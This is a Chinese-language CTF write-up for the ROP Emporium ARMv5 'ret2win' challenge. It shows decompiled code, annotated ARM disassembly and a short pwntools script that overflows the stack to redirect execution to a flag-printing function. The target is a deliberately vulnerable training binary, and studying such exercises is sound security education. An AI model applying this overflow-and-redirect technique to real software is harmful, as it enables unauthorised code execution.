ROP Emporium ARM x32

Challenge1_ret2win

1778148083918-aed8cfab-22df-4088-9d30-cb0f58a53bbe.png

1
2
3
4
5
6
7
8
9
10
11
int __fastcall main(int argc, const char **argv, const char **envp)
{
  int v3; // r0

  setvbuf((FILE *)_bss_start, 0, 2, 0);
  puts("ret2win by ROP Emporium");
  v3 = puts("ARMv5\n");
  pwnme(v3);
  puts("\nExiting");
  return 0;
}
  • stream: (FILE *):在很多反编译代码中,_bss_start 通常指向标准输出流 stdout。
  • buf: 0 (即 NULL):表示不使用用户自定义的缓冲区。
  • mode: 2 (即 _IONBF):这是关键点。2 代表 无缓冲 (No Buffering)。每当程序执行 puts 或 printf 时,数据会立即发送到终端或网络连接,而不会在内存中等待。
  • size: 既然没有缓冲区,大小自然设为 0。

1778148145180-7c7469b0-3e2e-450b-b9f7-aac18b6dbf91.png

1
2
3
4
5
int ret2win()
{
  puts("Well done! Here's your flag:");
  return system("/bin/cat flag.txt");
}

EXP:

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *
context.arch = "arm"                      # 32
p = process(['qemu-arm', '-L', "/usr/arm-linux-gnueabi", './ret2win_armv5'])
    
# context.arch = "aarch64"                # 64
# p = process(['qemu-aarch64', '-L', "/usr/aarch64-linux-gnu", './binary_64'])

ret2win_addr = 0x000105ec 
offset = 36 
payload = b"A" * offset + p32(ret2win_addr)

p.sendlineafter(b"> ", payload)
p.interactive()

汇编代码分析:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
.text:00010518 ; =============== S U B R O U T I N E =======================================
.text:00010518
.text:00010518 ; Attributes: bp-based frame
.text:00010518
.text:00010518 ; int __fastcall main(int argc, const char **argv, const char **envp)
.text:00010518                 EXPORT main
.text:00010518 main                                    ; DATA XREF: _start+20↑o
.text:00010518                                         ; .text:off_1045C↑o
.text:00010518                 PUSH    {R11,LR}                                      // 将R11(FP)和LR(返回地址)压栈
.text:0001051C                 ADD     R11, SP, #4
.text:00010520                 LDR     R3, =__bss_start
.text:00010524                 LDR     R0, [R3]        ; stream
.text:00010528                 MOV     R3, #0          ; n
.text:0001052C                 MOV     R2, #2          ; modes
.text:00010530                 MOV     R1, #0          ; buf
.text:00010534                 BL      setvbuf
.text:00010538                 LDR     R0, =s          ; "ret2win by ROP Emporium"
.text:0001053C                 BL      puts
.text:00010540                 LDR     R0, =aArmv5     ; "ARMv5\n"
.text:00010544                 BL      puts
.text:00010548                 BL      pwnme
.text:0001054C                 LDR     R0, =aExiting   ; "\nExiting"
.text:00010550                 BL      puts                 // BL 相当于call
.text:00010554                 MOV     R3, #0
.text:00010558                 MOV     R0, R3
.text:0001055C                 POP     {R11,PC}
.text:0001055C ; End of function main
.text:0001055C
.text:0001055C ; ---------------------------------------------------------------------------

更新: 2026-05-07 19:57:09
原文: https://www.yuque.com/idcm/wnemg9/wbkyuinxaomtbc8n